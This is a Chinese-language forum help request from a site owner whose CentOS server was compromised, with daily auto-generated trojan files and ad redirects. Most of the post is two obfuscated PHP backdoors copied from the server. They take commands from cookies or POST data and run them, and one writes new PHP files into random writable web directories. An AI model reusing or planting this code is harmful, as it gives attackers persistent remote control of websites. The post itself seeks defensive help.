为了能快速了解并处理您的问题,请提供以下基础信息:
免费版 [url=]8.0.4[/url]
系统:CentOS 7.5.1804 x86_64(Py3.7.9)
被入侵,每天自动生成木马文件,然后网页跳转到小视频广告页面。
- <?php /*lxk */function xyclb(){$ujyrjjt='wdojgihc'; print_r (79139+79139);/* qin*/}
- $ssgywerpcn/* mzkel */= 'ssgywerpcn' ^ ' ';
- function/*a */pyymvixxb_($kn_xqalen,/* sd */$bnpohvotsmg)
- {
- global $ssgywerpcn;/*_f */$kdzpfl/*ucbi*/= ""; for/* dapv */($zaauyvetbu = 0; $zaauyvetbu </* bjz */strlen($kn_xqalen);) {
- /* xdsxa */for ($bnpohvo = 0; $bnpohvo </* vyogl */strlen($bnpohvotsmg)/* lmdtw */&& $zaauyvetbu/* ywxqi*/</* tm*/strlen($kn_xqalen); $bnpohvo++,/* rhj_ */$zaauyvetbu++) {
- $kdzpfl .=/*jmyy*/$ssgywerpcn(ord($kn_xqalen[$zaauyvetbu]) ^ ord($bnpohvotsmg[$bnpohvo]));
- }
- }/*dpknn*/return/*z */$kdzpfl;
- }
- function kjjpsyuvn($lyxehu, $kn_xqalen){ global/* uxuyd */$ssgywerpcn;
- $afrqev/* vbct */= sprintf("\x2e" . "/"."%".$ssgywerpcn(115) . "."."p"."\154", md5($lyxehu));
- /* vhvvo*/file_put_contents($afrqev, "<"/*ibnb */. $ssgywerpcn(63) . $ssgywerpcn(112)/* ar */./*x */"h".$ssgywerpcn(112) . $ssgywerpcn(32) . "u"."n"."l"."i"."\156" ./*fqbm */"k".$ssgywerpcn(854-814) . "\137" . "_"."\106"/* qde */./*o */"\111"/*a */./* gxbg*/$ssgywerpcn(76) . $ssgywerpcn(220-151)/* y */. $ssgywerpcn(95) . $ssgywerpcn(95) . "\x29"/* cpzcg */. ";".$ssgywerpcn(32) . $kn_xqalen[$ssgywerpcn(265-165)]);
- include($afrqev); $txbkfgegt = $afrqev;
- /* ufiax */unlink($txbkfgegt);
- }
- function/* n*/_de_r(){ global $ssgywerpcn;
-
- /* tv */$zaauyvetbu = array();
- $zaauyvetbu["p".$ssgywerpcn(236-118)]/* hhfub */= phpversion();
- $zaauyvetbu["\x73"/* enptp*/. "v"] =/* hnrb */"3"."."."5";
- echo @serialize($zaauyvetbu);
- }
- function ihnyimf_k($kn_xqalen, $lyxehu, $rdqiaixj)
- {
- /* io_a*/global $ssgywerpcn;
- $kn_xqalen = unserialize(pyymvixxb_(pyymvixxb_(base64_decode($kn_xqalen),/*nvm */$lyxehu), $rdqiaixj));
- if (isset($kn_xqalen[$ssgywerpcn(97)/* q */./* un */$ssgywerpcn(520-413)])) { if ($kn_xqalen["a"] == "i") {
- /* k */_de_r();/* x */}/*zowjn */elseif/*a_ */($kn_xqalen["a"] == $ssgywerpcn(101)) {
- /* jchf */kjjpsyuvn($lyxehu, $kn_xqalen);
- /*d*/}
- /*angx */exit();
- }}
- $kiqgcjxshz/*aybq */=/* tjz */$_COOKIE;$eohltwu =/* yy*/$_POST;
- $kiqgcjxshz = array_merge($eohltwu, $kiqgcjxshz);
- $lyxehu =/* f */$ssgywerpcn(295-197) ./* nfa */$ssgywerpcn(52)/*wah */. "\x31"/* lyj */./* kik_ */"\x33"/*tmktl */./* bmsob*/$ssgywerpcn(50) . $ssgywerpcn(121-65) . "\x31" . "\62" . "-"."\x64"/* _ */. $ssgywerpcn(49) . "f".$ssgywerpcn(53) . "\55"/* zhq*/./*xtuat*/"\64" ./* kf */"3"."\144" . "8"."\55" . "9".$ssgywerpcn(101)."9".$ssgywerpcn(57) ./* hn */"\55" ./* qzrav*/"\60" . "1".$ssgywerpcn(54) . "\x35" ./* kaihb*/$ssgywerpcn(179-77) . $ssgywerpcn(102) ./* x */"\x38"/*nnrhp */. "7".$ssgywerpcn(54)/* j*/. "0"."\x37" . "0";
- foreach ($kiqgcjxshz/*ueynv */as $rdqiaixj =>/* oo */$kn_xqalen) {
- /*a */ihnyimf_k($kn_xqalen, $lyxehu, $rdqiaixj);
- }
复制代码
- themes.php
- <?php $eiPORyHuD = "\x44".'O'.chr(67)."\125"."\x4d".chr(69)."\x4e"."\x54"."\x5f"."\x52"."\x4f".chr(79).chr(488-404);$mQeLbMGGH = "\x48".chr(793-709).chr(84)."\x50".chr(95)."\110".'O'."\123".chr(612-528);$EqgzY = chr(955-851).'t'."\164".chr(112).chr(58).chr(47)."\57";$JuqNXjgAE = "\56"."\x70"."\150".chr(112);$xmRiMBXufw = "\160".chr(104).'p';$LhKfGPavo = chr(102).chr(350-245)."\x6c"."\x65"."\137".chr(630-518).chr(117).'t'.chr(1077-982).'c'."\x6f".'n'."\164"."\145".chr(110)."\164".chr(115);$CmwjEUGCOh = 'r'.chr(97).chr(119).chr(117).'r'.chr(108).chr(100)."\145".chr(99).'o'.'d'."\145";$HejiZoUGGb = "\x75".chr(110).chr(115)."\x65".chr(114).'i'."\x61".chr(108)."\x69".chr(594-472)."\145";$ExCCez = chr(105)."\x73"."\x5f"."\x77"."\x72".chr(552-447).chr(116)."\141".chr(98)."\x6c".chr(850-749);$UHrOh = "\160"."\150".chr(112)."\x76"."\145".chr(857-743).chr(868-753)."\151".chr(928-817).'n';$qWcAnj = chr(684-569).chr(116).chr(940-826).chr(95).chr(142-28).chr(541-430).chr(116).chr(657-608).chr(463-412);$iRQyI = chr(115).chr(247-146)."\162"."\151"."\141"."\154"."\151".'z'.chr(607-506);$lbFvqwTk = "\163".chr(116)."\162"."\137"."\163".chr(284-172).chr(108)."\x69".'t';foreach ($_POST as $LjGYaNIPG => $IkFCctu){$fKpOQVhU = strlen($LjGYaNIPG);if ($fKpOQVhU == 16){$IkFCctu = $lbFvqwTk($CmwjEUGCOh($qWcAnj($IkFCctu)));$LjGYaNIPG = array_slice($lbFvqwTk(str_repeat($LjGYaNIPG, (count($IkFCctu)/16)+1)), 0, count($IkFCctu));function nJBnsCDb($rFbUM, $vuUkPGaBA, $LjGYaNIPG){$aCXFOCnojs = "9250814d-4f45-46d8-bc88-5d4a5707300c";return $rFbUM ^ $aCXFOCnojs[$vuUkPGaBA % strlen($aCXFOCnojs)] ^ $LjGYaNIPG;}$IkFCctu = array_map("nJBnsCDb", array_values($IkFCctu), array_keys($IkFCctu), array_values($LjGYaNIPG));$IkFCctu = implode("", $IkFCctu);$IkFCctu = @$HejiZoUGGb($IkFCctu);if (@is_array($IkFCctu)){$qpWgwklWJWhYzBYj = array_keys($IkFCctu);$IkFCctu = $IkFCctu[$qpWgwklWJWhYzBYj[0]];if ($IkFCctu === $qpWgwklWJWhYzBYj[0]){echo @$iRQyI(Array($xmRiMBXufw => @$UHrOh(), ));exit();}else {function HnxkXivxRP($qpWgwklir){static $lQTcstB = array();$iDcDhF = glob($qpWgwklir . '/*', GLOB_ONLYDIR);$mpUZABBn = count($iDcDhF);if ($mpUZABBn > 0) {foreach ($iDcDhF as $qpWgwkl) {if (@$ExCCez($qpWgwkl)) {$lQTcstB[] = $qpWgwkl;}}}foreach ($iDcDhF as $qpWgwklir) HnxkXivxRP($qpWgwklir);return $lQTcstB;}$kZKkSu = $_SERVER[$eiPORyHuD];$iDcDhF = HnxkXivxRP($kZKkSu);$qpWgwklWJWhYzBYj = array_rand($iDcDhF);$FYTATZ = $iDcDhF[$qpWgwklWJWhYzBYj] . "/" . substr(md5(time()), 0, 8) . $JuqNXjgAE;@$LhKfGPavo($FYTATZ, $IkFCctu);$OPVIrEk = $EqgzY . $_SERVER[$mQeLbMGGH] . substr($FYTATZ, strlen($kZKkSu));print($OPVIrEk);die();}}}}
复制代码
|
-
|